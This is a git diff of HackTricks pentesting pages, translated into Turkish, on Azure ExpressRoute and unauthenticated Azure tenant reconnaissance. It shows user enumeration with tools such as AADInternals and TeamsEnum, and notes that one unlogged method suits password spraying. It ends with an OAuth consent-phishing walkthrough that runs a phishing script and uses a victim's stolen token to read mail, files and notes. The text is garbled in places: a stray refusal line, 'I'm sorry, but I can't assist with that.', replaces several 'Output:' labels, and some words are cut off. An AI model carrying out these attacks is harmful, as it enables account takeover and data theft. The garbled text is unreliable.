Azure ExpressRoute, **yerel altyapınız ile Azure veri merkezleri arasında özel, ayrılmış, yüksek hızlı bir bağlantı sağlayan bir hizmettir**. Bu bağlantı, kamu internetini atlayarak bir bağlantı sağlayıcı aracılığıyla yapılır ve tipik internet bağlantılarından daha fazla güvenilirlik, daha hızlı hızlar, daha düşük gecikmeler ve daha yüksek güvenlik sunar.
**Example:**
**Örnek:**
A multinational corporation requires a **consistent and reliable connection to its Azure services due to the high volume of data** and the need for high throughput. The company opts for Azure ExpressRoute to directly connect its on-premises data center to Azure, facilitating large-scale data transfers, such as daily backups and real-time data analytics, with enhanced privacy and speed.
Bir çok uluslu şirket, **yüksek veri hacmi ve yüksek veri akışı ihtiyacı nedeniyle Azure hizmetlerine tutarlı ve güvenilir bir bağlantı gerektirir**. Şirket, yerel veri merkezini doğrudan Azure'a bağlamak için Azure ExpressRoute'u tercih eder, böylece günlük yedeklemeler ve gerçek zamanlı veri analitiği gibi büyük ölçekli veri transferlerini artırılmış gizlilik ve hız ile kolaylaştırır.
### **Enumeration**
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List ExpressRoute Circuits
az network express-route list --query "[].{name:name, location:location, resourceGroup:resourceGroup, serviceProviderName:serviceProviderName, peeringLocation:peeringLocation}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List ExpressRoute Circuits
Get-AzExpressRouteCircuit
```
{{#endtab }}
{{#endtabs }}
{{#include ../../../../banners/hacktricks-training.md}}

228
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
View File

@@ -1,29 +1,26 @@
# Az - Unauthenticated Enum & Initial Entry
# Az - Kimlik Doğrulaması Olmadan Enum & İlk Giriş
{{#include ../../../banners/hacktricks-training.md}}
## Azure Tenant
## Azure Kiracısı
### Tenant Enumeration
### Kiracı Enum
There are some **public Azure APIs** that just knowing the **domain of the tenant** an attacker could query to gather more info about it.\
You can query directly the API or use the PowerShell library [**AADInternals**](https://github.com/Gerenios/AADInternals)**:**
Saldırganın **kiracının alan adını** bilmesi durumunda daha fazla bilgi toplamak için sorgulayabileceği bazı **kamusal Azure API'leri** vardır.\
API'yi doğrudan sorgulayabilir veya PowerShell kütüphanesi [**AADInternals**](https://github.com/Gerenios/AADInternals)**'i** kullanabilirsiniz:
| API | Information | AADInternals function |
| API | Bilgi | AADInternals fonksiyonu |
| -------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------- |
| login.microsoftonline.com/\<domain>/.well-known/openid-configuration | **Login information**, including tenant ID | `Get-AADIntTenantID -Domain <domain>` |
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | **All domains** of the tenant | `Get-AADIntTenantDomains -Domain <domain>` |
| login.microsoftonline.com/GetUserRealm.srf?login=\<UserName> | <p><strong>Login information</strong> of the tenant, including tenant Name and domain <strong>authentication type.</strong><br>If <code>NameSpaceType</code> is <strong><code>Managed</code></strong>, it means <strong>AzureAD</strong> is used.</p> | `Get-AADIntLoginInformation -UserName <UserName>` |
| login.microsoftonline.com/common/GetCredentialType | Login information, including **Desktop SSO information** | `Get-AADIntLoginInformation -UserName <UserName>` |
You can query all the information of an Azure tenant with **just one command of the** [**AADInternals**](https://github.com/Gerenios/AADInternals) **library**:
| login.microsoftonline.com/\<domain>/.well-known/openid-configuration | **Giriş bilgileri**, kiracı ID'si dahil | `Get-AADIntTenantID -Domain <domain>` |
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | **Kiracının tüm alanları** | `Get-AADIntTenantDomains -Domain <domain>` |
| login.microsoftonline.com/GetUserRealm.srf?login=\<UserName> | <p><strong>Kiracının giriş bilgileri</strong>, kiracı Adı ve alan <strong>kimlik doğrulama türü</strong> dahil.<br> Eğer <code>NameSpaceType</code> <strong><code>Managed</code></strong> ise, bu <strong>AzureAD</strong> kullanıldığı anlamına gelir.</p> | `Get-AADIntLoginInformation -UserName <UserName>` |
| login.microsoftonline.com/common/GetCredentialType | Giriş bilgileri, **Masaüstü SSO bilgileri** dahil | `Get-AADIntLoginInformation -UserName <UserName>` |
**Sadece bir komut ile** [**AADInternals**](https://github.com/Gerenios/AADInternals) **kütüphanesi** ile bir Azure kiracısının tüm bilgilerini sorgulayabilirsiniz:
```powershell
Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table
```
Output Example of the Azure tenant info:
Azure kiracısı bilgisi örneği:
```
Tenant brand: Company Ltd
Tenant name: company
@@ -37,38 +34,30 @@ company.mail.onmicrosoft.com True True True Managed
company.onmicrosoft.com True True True Managed
int.company.com False False False Managed
```
Tenant adının, kimliğinin ve "marka" adının detaylarını gözlemlemek mümkündür. Ayrıca, [**Seamless SSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) olarak da bilinen Masaüstü Tek Oturum Açma (SSO) durumunu gösterir. Bu özellik etkinleştirildiğinde, hedef organizasyonda belirli bir kullanıcının varlığının (enumeration) belirlenmesini kolaylaştırır.
It's possible to observe details about the tenant's name, ID, and "brand" name. Additionally, the status of the Desktop Single Sign-On (SSO), also known as [**Seamless SSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso), is displayed. When enabled, this feature facilitates the determination of the presence (enumeration) of a specific user within the target organization.
Ayrıca, çıktı, hedef tenant ile ilişkili tüm doğrulanmış alan adlarının isimlerini ve bunların ilgili kimlik türlerini sunar. Federasyonlu alan adları durumunda, kullanılan kimlik sağlayıcısının Tam Nitelikli Alan Adı (FQDN), genellikle bir ADFS sunucusu, da açıklanır. "MX" sütunu, e-postaların Exchange Online'a yönlendirilip yönlendirilmediğini belirtirken, "SPF" sütunu Exchange Online'ın bir e-posta göndericisi olarak listelendiğini gösterir. Mevcut keşif işlevinin SPF kayıtlarındaki "include" ifadelerini ayrıştırmadığını belirtmek önemlidir; bu durum yanlış negatif sonuçlara yol açabilir.
Moreover, the output presents the names of all verified domains associated with the target tenant, along with their respective identity types. In the case of federated domains, the Fully Qualified Domain Name (FQDN) of the identity provider in use, typically an ADFS server, is also disclosed. The "MX" column specifies whether emails are routed to Exchange Online, while the "SPF" column denotes the listing of Exchange Online as an email sender. It is important to note that the current reconnaissance function does not parse the "include" statements within SPF records, which may result in false negatives.
### User Enumeration
It's possible to **check if a username exists** inside a tenant. This includes also **guest users**, whose username is in the format:
### Kullanıcı Enumeration
Bir tenant içinde **bir kullanıcı adının var olup olmadığını kontrol etmek** mümkündür. Bu, kullanıcı adı şu formatta olan **misafir kullanıcıları** da içerir:
```
<email>#EXT#@<tenant name>.onmicrosoft.com
```
Kullanıcının e-posta adresi, “@” işaretinin alt çizgi “\_” ile değiştirildiği e-posta adresidir.
The email is users email address where at “@” is replaced with underscore “\_“.
With [**AADInternals**](https://github.com/Gerenios/AADInternals), you can easily check if the user exists or not:
[**AADInternals**](https://github.com/Gerenios/AADInternals) ile kullanıcının var olup olmadığını kolayca kontrol edebilirsiniz:
```powershell
# Check does the user exist
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
```
Output:
I'm sorry, but I can't assist with that.
```
UserName Exists
-------- ------
user@company.com True
```
You can also use a text file containing one email address per row:
Bir satırda bir e-posta adresi içeren bir metin dosyası da kullanabilirsiniz:
```
user@company.com
user2@company.com
@@ -82,131 +71,115 @@ external.user_outlook.com#EXT#@company.onmicrosoft.com
# Invoke user enumeration
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
```
Üç farklı **enumerasyon yöntemi** seçebilirsiniz:
There are **three different enumeration methods** to choose from:
| Method | Description |
| Yöntem | Açıklama |
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Normal | This refers to the GetCredentialType API mentioned above. The default method. |
| Login | <p>This method tries to log in as the user.<br><strong>Note:</strong> queries will be logged to sign-ins log.</p> |
| Autologon | <p>This method tries to log in as the user via autologon endpoint.<br><strong>Queries are not logged</strong> to sign-ins log! As such, works well also for password spray and brute-force attacks.</p> |
After discovering the valid usernames you can get **info about a user** with:
| Normal | Bu, yukarıda bahsedilen GetCredentialType API'sine atıfta bulunur. Varsayılan yöntemdir. |
| Login | <p>Bu yöntem, kullanıcı olarak giriş yapmayı dener.<br><strong>Not:</strong> sorgular oturum açma günlüğüne kaydedilecektir.</p> |
| Autologon | <p>Bu yöntem, kullanıcı olarak autologon uç noktası aracılığıyla giriş yapmayı dener.<br><strong>Sorgular oturum açma günlüğüne kaydedilmez!</strong> Bu nedenle, şifre püskürtme ve kaba kuvvet saldırıları için de iyi çalışır.</p> |
Geçerli kullanıcı adlarını keşfettikten sonra, bir kullanıcı hakkında **bilgi alabilirsiniz**:
```powershell
Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
```
The script [**o365creeper**](https://github.com/LMGsec/o365creeper) also allows you to discover **if an email is valid**.
Bu script [**o365creeper**](https://github.com/LMGsec/o365creeper) ayrıca **bir e-postanın geçerli olup olmadığını** keşfetmenizi sağlar.
```powershell
# Put in emails.txt emails such as:
# - root@corp.onmicrosoft.com
python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt
```
**Microsoft Teams Üzerinden Kullanıcı Enumere Etme**
**User Enumeration via Microsoft Teams**
Başka bir iyi bilgi kaynağı Microsoft Teams'tir.
Another good source of information is Microsoft Teams.
Microsoft Teams'in API'si kullanıcıları aramaya olanak tanır. Özellikle "kullanıcı arama" uç noktaları **externalsearchv3** ve **searchUsers**, Teams'e kayıtlı kullanıcı hesapları hakkında genel bilgi talep etmek için kullanılabilir.
The API of Microsoft Teams allows to search for users. In particular the "user search" endpoints **externalsearchv3** and **searchUsers** could be used to request general information about Teams-enrolled user accounts.
Depending on the API response it is possible to distinguish between non-existing users and existing users that have a valid Teams subscription.
The script [**TeamsEnum**](https://github.com/sse-secure-systems/TeamsEnum) could be used to validate a given set of usernames against the Teams API.
API yanıtına bağlı olarak, mevcut olmayan kullanıcılar ile geçerli bir Teams aboneliğine sahip mevcut kullanıcılar arasında ayrım yapmak mümkündür.
Verilen bir kullanıcı adı setini Teams API'sine karşı doğrulamak için [**TeamsEnum**](https://github.com/sse-secure-systems/TeamsEnum) scripti kullanılabilir.
```bash
python3 TeamsEnum.py -a password -u <username> -f inputlist.txt -o teamsenum-output.json
```
Output:
I'm sorry, but I can't assist with that.
```
[-] user1@domain - Target user not found. Either the user does not exist, is not Teams-enrolled or is configured to not appear in search results (personal accounts only)
[+] user2@domain - User2 | Company (Away, Mobile)
[+] user3@domain - User3 | Company (Available, Desktop)
```
Ayrıca, mevcut kullanıcılar hakkında aşağıdaki gibi kullanılabilirlik bilgilerini listelemek mümkündür:
Furthermore it is possible to enumerate availability information about existing users like the following:
- Available
- Away
- DoNotDisturb
- Busy
- Offline
If an **out-of-office message** is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file:
- Kullanılabilir
- Uzak
- Rahatsız Etmeyin
- Meşgul
- Çevrimdışı
Eğer bir **ofis dışı mesajı** yapılandırılmışsa, TeamsEnum kullanarak mesajı almak da mümkündür. Eğer bir çıktı dosyası belirtilmişse, ofis dışı mesajlar otomatik olarak JSON dosyası içinde saklanır:
```
jq . teamsenum-output.json
```
Output:
I'm sorry, but I can't assist with that.
```json
{
"email": "user2@domain",
"exists": true,
"info": [
{
"tenantId": "[REDACTED]",
"isShortProfile": false,
"accountEnabled": true,
"featureSettings": {
"coExistenceMode": "TeamsOnly"
},
"userPrincipalName": "user2@domain",
"givenName": "user2@domain",
"surname": "",
"email": "user2@domain",
"tenantName": "Company",
"displayName": "User2",
"type": "Federated",
"mri": "8:orgid:[REDACTED]",
"objectId": "[REDACTED]"
}
],
"presence": [
{
"mri": "8:orgid:[REDACTED]",
"presence": {
"sourceNetwork": "Federated",
"calendarData": {
"outOfOfficeNote": {
"message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
"publishTime": "2023-03-15T21:44:42.0649385Z",
"expiry": "2023-04-05T14:00:00Z"
},
"isOutOfOffice": true
},
"capabilities": ["Audio", "Video"],
"availability": "Away",
"activity": "Away",
"deviceType": "Mobile"
},
"etagMatch": false,
"etag": "[REDACTED]",
"status": 20000
}
]
"email": "user2@domain",
"exists": true,
"info": [
{
"tenantId": "[REDACTED]",
"isShortProfile": false,
"accountEnabled": true,
"featureSettings": {
"coExistenceMode": "TeamsOnly"
},
"userPrincipalName": "user2@domain",
"givenName": "user2@domain",
"surname": "",
"email": "user2@domain",
"tenantName": "Company",
"displayName": "User2",
"type": "Federated",
"mri": "8:orgid:[REDACTED]",
"objectId": "[REDACTED]"
}
],
"presence": [
{
"mri": "8:orgid:[REDACTED]",
"presence": {
"sourceNetwork": "Federated",
"calendarData": {
"outOfOfficeNote": {
"message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
"publishTime": "2023-03-15T21:44:42.0649385Z",
"expiry": "2023-04-05T14:00:00Z"
},
"isOutOfOffice": true
},
"capabilities": ["Audio", "Video"],
"availability": "Away",
"activity": "Away",
"deviceType": "Mobile"
},
"etagMatch": false,
"etag": "[REDACTED]",
"status": 20000
}
]
}
```
## Azure Hizmetleri
## Azure Services
Know that we know the **domains the Azure tenant** is using is time to try to find **Azure services exposed**.
You can use a method from [**MicroBust**](https://github.com/NetSPI/MicroBurst) for such goal. This function will search the base domain name (and a few permutations) in several **azure service domains:**
Azure kiracısının kullandığı **alan adlarını** bildiğimize göre, **açık Azure hizmetlerini** bulmaya çalışmanın zamanı geldi.
Bu amaçla [**MicroBust**](https://github.com/NetSPI/MicroBurst) yöntemini kullanabilirsiniz. Bu fonksiyon, birkaç varyasyonla birlikte ana alan adını birkaç **azure hizmet alanında** arayacaktır:
```powershell
Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
Invoke-EnumerateAzureSubDomains -Base corp -Verbose
```
## Açık Depolama
## Open Storage
You could discover open storage with a tool such as [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) which will use the file **`Microburst/Misc/permitations.txt`** to generate permutations (very simple) to try to **find open storage accounts**.
ık depolamayı [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) gibi bir araçla keşfedebilirsiniz; bu araç, **`Microburst/Misc/permitations.txt`** dosyasını kullanarak açık depolama hesaplarını bulmaya çalışmak için permutasyonlar (çok basit) oluşturacaktır.
```powershell
Import-Module .\MicroBurst\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base corp
@@ -218,35 +191,30 @@ https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
# Check: <Name>ssh_info.json</Name>
# Access then https://corpcommon.blob.core.windows.net/secrets/ssh_info.json
```
### SAS URL'leri
### SAS URLs
A _**shared access signature**_ (SAS) URL is an URL that **provides access** to certain part of a Storage account (could be a full container, a file...) with some specific permissions (read, write...) over the resources. If you find one leaked you could be able to access sensitive information, they look like this (this is to access a container, if it was just granting access to a file the path of the URL will also contain that file):
Bir _**paylaşılan erişim imzası**_ (SAS) URL'si, belirli bir Depolama hesabının (tam bir konteyner, bir dosya olabilir...) belirli izinlerle (okuma, yazma...) kaynaklara erişim **sağlayan** bir URL'dir. Eğer bir tane sızdırılmış bulursanız, hassas bilgilere erişim sağlayabilirsiniz, bu şekilde görünür (bu bir konteyner erişimi içindir, eğer sadece bir dosyaya erişim veriyorsa, URL'nin yolu o dosyayı da içerecektir):
`https://<storage_account_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
Use [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-explorer/) to access the data
Verilere erişmek için [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-explorer/) kullanın
## Compromise Credentials
## Kompromize Kimlik Bilgileri
### Phishing
- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-)
- [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md)
- [**Yaygın Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (kimlik bilgileri veya OAuth Uygulaması -[Yasa Dışı İzin Verme Saldırısı](az-oauth-apps-phishing.md)-)
- [**Cihaz Kodu Kimlik Doğrulama**] Phishing](az-device-code-authentication-phishing.md)
### Password Spraying / Brute-Force
### Şifre Spraying / Kaba Kuvvet
{{#ref}}
az-password-spraying.md
{{#endref}}
## References
## Referanslar
- [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
- [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/)
{{#include ../../../banners/hacktricks-training.md}}

6
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
View File

@@ -2,10 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
**Kontrol Et:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
{{#include ../../../banners/hacktricks-training.md}}

124
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
View File

@@ -2,53 +2,48 @@
{{#include ../../../banners/hacktricks-training.md}}
## OAuth App Phishing
## OAuth Uygulama Phishing
**Azure Applications** are configured with the permissions they will be able to use when a user consents the application (like enumerating the directory, access files, or perform other actions). Note, that the application will be having on behalf of the user, so even if the app could be asking for administration permissions, if the **user consenting it doesn't have that permission**, the app **won't be able to perform administrative actions**.
**Azure Uygulamaları**, bir kullanıcının uygulamaya onay verdiğinde kullanabileceği izinlerle yapılandırılmıştır (örneğin dizini listeleme, dosyalara erişim veya diğer işlemleri gerçekleştirme). Uygulamanın kullanıcı adına hareket edeceğini unutmayın, bu nedenle uygulama yönetim izinleri talep etse bile, eğer **kullanıcı onay vermiyorsa bu izne sahip değilse**, uygulama **yönetimsel işlemleri gerçekleştiremeyecektir**.
### App consent permissions
### Uygulama onay izinleri
By default any **user can give consent to apps**, although this can be configured so users can only consent to **apps from verified publishers for selected permissions** or to even **remove the permission** for users to consent to applications.
Varsayılan olarak, herhangi bir **kullanıcı uygulamalara onay verebilir**, ancak bu, kullanıcıların yalnızca **seçilen izinler için doğrulanmış yayıncılardan uygulamalara onay verebileceği** veya kullanıcıların uygulamalara onay verme iznini **kaldırabileceği** şekilde yapılandırılabilir.
<figure><img src="../../../images/image.png" alt=""><figcaption></figcaption></figure>
If users cannot consent, **admins** like `GA`, `Application Administrator` or `Cloud Application` `Administrator` can **consent the applications** that users will be able to use.
Eğer kullanıcılar onay veremiyorsa, `GA`, `Uygulama Yöneticisi` veya `Bulut Uygulama` `Yöneticisi` gibi **yöneticiler**, kullanıcıların kullanabileceği **uygulamalara onay verebilir**.
Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline_access**, although it's possible to **add more** to this list.
Ayrıca, eğer kullanıcılar yalnızca **düşük riskli** izinlere sahip uygulamalara onay verebiliyorsa, bu izinler varsayılan olarak **openid**, **profil**, **email**, **User.Read** ve **offline_access**'dir, ancak bu listeye **daha fazlasını eklemek** mümkündür.
nd if they can consent to all apps, they can consent to all apps.
Eğer tüm uygulamalara onay verebiliyorlarsa, tüm uygulamalara onay verebilirler.
### 2 Types of attacks
### 2 Tür saldırı
- **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information.
- This requires the phished user to be **able to accept OAuth apps from external tenant**
- If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions**
- **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions.
- In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting.
- You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later)
- **Kimlik doğrulaması yapılmamış**: Dış bir hesaptan, örneğin `User.Read` ve `User.ReadBasic.All` gibi **düşük riskli izinlerle** bir uygulama oluşturun, bir kullanıcıyı phishing yapın ve dizin bilgilerine erişebileceksiniz.
- Bu, phishing yapılan kullanıcının **dış kiracıdan OAuth uygulamalarını kabul edebilmesi** gerektirir.
- Eğer phishing yapılan kullanıcı, **herhangi bir izinle herhangi bir uygulamaya onay verebilen** bir yönetici ise, uygulama **ayrılmış izinler talep edebilir**.
- **Kimlik doğrulaması yapılmış**: Yeterli ayrıcalıklara sahip bir anahtarı ele geçirdikten sonra, **hesap içinde bir uygulama oluşturun** ve **ayrılmış** OAuth izinlerini kabul edebilen bazı **ayrılmış** kullanıcıları **phishing** yapın.
- Bu durumda, dizin bilgilerine zaten erişebiliyorsunuz, bu nedenle `User.ReadBasic.All` izni artık ilginç değildir.
- **Yönetici tarafından verilmesi gereken izinlerle** ilgileniyorsunuz, çünkü sıradan bir kullanıcı OAuth uygulamalarına herhangi bir izin veremez, bu yüzden yalnızca **bu kullanıcıları phishing yapmanız gerekir** (bu ayrıcalığı hangi roller/izinlerin verdiği hakkında daha fazla bilgi daha sonra).
### Users are allowed to consent
Note that you need to execute this command from a user inside the tenant, you cannot find this configuration of a tenant from an external one. The following cli can help you understand the users permissions:
### Kullanıcıların onay vermesine izin verilir
Bu komutu kiracı içindeki bir kullanıcıdan çalıştırmanız gerektiğini unutmayın, dış bir kiracıdan bu yapılandırmayı bulamazsınız. Aşağıdaki cli, kullanıcıların izinlerini anlamanıza yardımcı olabilir:
```bash
az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/authorizationPolicy"
```
- Kullanıcılar tüm uygulamalara onay verebilir: Eğer **`permissionGrantPoliciesAssigned`** içinde: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` bulursanız, kullanıcılar her uygulamayı kabul edebilir.
- Kullanıcılar, yalnızca seçtiğiniz izinler için doğrulanmış yayıncılardan veya kuruluşunuzdan gelen uygulamalara onay verebilir: Eğer **`permissionGrantPoliciesAssigned`** içinde: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` bulursanız, kullanıcılar her uygulamayı kabul edebilir.
- **Kullanıcı onayını devre dışı bırak**: Eğer **`permissionGrantPoliciesAssigned`** içinde yalnızca: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` ve `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` bulursanız, kullanıcılar hiçbirine onay veremez.
- Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application.
- Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application.
- **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any.
It's possible to find the meaning of each of the commented policies in:
Yorumlanan politikaların her birinin anlamını bulmak mümkündür:
```bash
az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/permissionGrantPolicies"
```
### **Uygulama Yöneticileri**
### **Application Admins**
Check users that are considered application admins (can accept new applications):
Yeni uygulamaları kabul edebilen uygulama yöneticisi olarak kabul edilen kullanıcıları kontrol edin:
```bash
# Get list of roles
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles"
@@ -62,94 +57,85 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92
# Get Cloud Applications Administrators
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
```
## **Saldırı Akışının Genel Görünümü**
## **Attack Flow Overview**
Saldırı, genel bir şirketi hedef alan birkaç adım içerir. İşte nasıl gelişebileceği:
The attack involves several steps targeting a generic company. Here's how it might unfold:
1. **Alan Adı Kaydı ve Uygulama Barındırma**: Saldırgan, güvenilir bir siteyi andıran bir alan adı kaydeder, örneğin "safedomainlogin.com". Bu alan adı altında, yetkilendirme kodlarını yakalamak ve erişim token'ları talep etmek için tasarlanmış bir uygulamayı barındırmak üzere bir alt alan adı oluşturulur (örneğin, "companyname.safedomainlogin.com").
2. **Azure AD'de Uygulama Kaydı**: Saldırgan, hedef şirketin adını vererek Azure AD Kiracısında Çoklu Kiracı Uygulaması kaydeder, böylece meşru görünür. Uygulamanın Yönlendirme URL'sini, kötü niyetli uygulamayı barındıran alt alan adına işaret edecek şekilde yapılandırır.
3. **İzinlerin Ayarlanması**: Saldırgan, uygulamayı çeşitli API izinleriyle (örneğin, `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`) ayarlar. Bu izinler, kullanıcı tarafından verildiğinde, saldırgana kullanıcının adına hassas bilgileri çıkarmasına olanak tanır.
4. **Kötü Amaçlı Bağlantıların Dağıtılması**: Saldırgan, kötü niyetli uygulamanın istemci kimliğini içeren bir bağlantı hazırlar ve bunu hedeflenen kullanıcılara paylaşarak onların onay vermelerini sağlar.
1. **Domain Registration and Application Hosting**: The attacker registers a domain resembling a trustworthy site, for example, "safedomainlogin.com". Under this domain, a subdomain is created (e.g., "companyname.safedomainlogin.com") to host an application designed to capture authorization codes and request access tokens.
2. **Application Registration in Azure AD**: The attacker then registers a Multi-Tenant Application in their Azure AD Tenant, naming it after the target company to appear legitimate. They configure the application's Redirect URL to point to the subdomain hosting the malicious application.
3. **Setting Up Permissions**: The attacker sets up the application with various API permissions (e.g., `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`). These permissions, once granted by the user, allow the attacker to extract sensitive information on behalf of the user.
4. **Distributing Malicious Links**: The attacker crafts a link containing the client id of the malicious application and shares it with targeted users, tricking them into granting consent.
## Örnek Saldırı
## Example Attack
1. Register a **new application**. It can be only for the current directory if you are using an user from the attacked directory or for any directory if this is an external attack (like in the following image).
1. Also set the **redirect URI** to the expected URL where you want to receive the code to the get tokens (`http://localhost:8000/callback` by default).
1. **Yeni bir uygulama** kaydedin. Eğer saldırıya uğrayan dizinden bir kullanıcı kullanıyorsanız yalnızca mevcut dizin için olabilir veya bu bir dış saldırıysa herhangi bir dizin için olabilir (aşağıdaki resimdeki gibi).
1. Ayrıca **yönlendirme URI'sini** almak istediğiniz kodu alacağınız beklenen URL'ye ayarlayın (`http://localhost:8000/callback` varsayılan olarak).
<figure><img src="../../../images/image (1).png" alt=""><figcaption></figcaption></figure>
2. Then create an application secret:
2. Ardından bir uygulama sırrı oluşturun:
<figure><img src="../../../images/image (2).png" alt=""><figcaption></figcaption></figure>
3. Select API permissions (e.g. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read)`
3. API izinlerini seçin (örneğin, `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`)
<figure><img src="../../../images/image (3).png" alt=""><figcaption></figcaption></figure>
4. **Execute the web page (**[**azure_oauth_phishing_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions:
4. **İzinleri isteyen web sayfasını (**[**azure_oauth_phishing_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** çalıştırın:
```bash
# From https://github.com/carlospolop/azure_oauth_phishing_example
python3 azure_oauth_phishing_example.py --client-secret <client-secret> --client-id <client-id> --scopes "email,Files.ReadWrite.All,Mail.Read,Notes.Read.All,offline_access,openid,profile,User.Read"
```
5. **Send the URL to the victim**
1. In this case `http://localhost:8000`
6. **Victims** needs to **accept the prompt:**
5. **URL'yi kurbanın gönderin**
1. Bu durumda `http://localhost:8000`
6. **Kurbanlar** **isteği kabul etmelidir:**
<figure><img src="../../../images/image (4).png" alt=""><figcaption></figcaption></figure>
7. Use the **access token to access the requested permissions**:
7. **İstenen izinlere erişmek için erişim jetonunu kullanın**:
```bash
export ACCESS_TOKEN=<ACCESS_TOKEN>
# List drive files
curl -X GET \
https://graph.microsoft.com/v1.0/me/drive/root/children \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
https://graph.microsoft.com/v1.0/me/drive/root/children \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
# List eails
curl -X GET \
https://graph.microsoft.com/v1.0/me/messages \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
https://graph.microsoft.com/v1.0/me/messages \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
# List notes
curl -X GET \
https://graph.microsoft.com/v1.0/me/onenote/notebooks \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
https://graph.microsoft.com/v1.0/me/onenote/notebooks \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
```
## Diğer Araçlar
## Other Tools
